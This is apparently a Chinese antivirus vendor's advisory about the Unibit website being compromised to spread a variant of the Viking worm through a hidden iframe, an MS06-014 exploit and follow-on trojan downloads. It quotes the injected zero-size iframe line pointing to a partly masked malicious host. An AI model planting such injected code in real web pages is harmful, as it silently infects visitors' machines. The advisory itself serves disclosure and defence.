近日，江民公司反病毒中心监测到，知名数码产品公司优百特（Unibit）官方网站大部分网页均带有恶意代码，没有打好系统漏洞补丁的电脑用户点击这些网页时，就会感染“威金”蠕虫的最新变种。“威金”蠕虫会感染可执行文件，并能通过局域网传播，严重的会导致局域网瘫痪，病毒还会下载其他若干木马程序,黑客可以借此远程控制中毒电脑。

    江民反病毒专家介绍，经过对网页源代码分析，在优百特首页（http://www.unibit.***.**/default.asp）和产品中心页面（http://www.unibit.***.**/products_list.asp）等多个页面尾部均包含对恶意网页的引用代码：
<iframe src=http://www.kr***.com/worm.htm width=0 height=0></iframe>

    该恶意代码引用的恶意网页会转链另一恶意网站，而后者包含经过加密的恶意VBScript脚本，该脚本利用微软MS06-014漏洞，自动下载病毒文件名为worm.exe“威金”蠕虫。

    反病毒专家介绍，worm.exe是威金蠕虫的最新变种，大小68K字节，文件显示为熊猫样的图标。运行后会遍历并感染正常的可执行文件，通过共享文件夹及IPC共享传播。该蠕虫还会下载worm.txt文件，该文件是一个地址列表，包含多个木马及后门程序的网址，威金蠕虫会下载并执行列表中指定的5个木马后门，黑客利用上述木马可以远程操控中毒电脑，严重侵害用户的电脑数据安全。

    针对该病毒，江民公司已经及时升级了病毒库，江民杀毒软件KV系列产品用户请立即升级到12月21日病毒库，即可查杀上述所有蠕虫、木马和后门病毒，确保电脑和数据安全。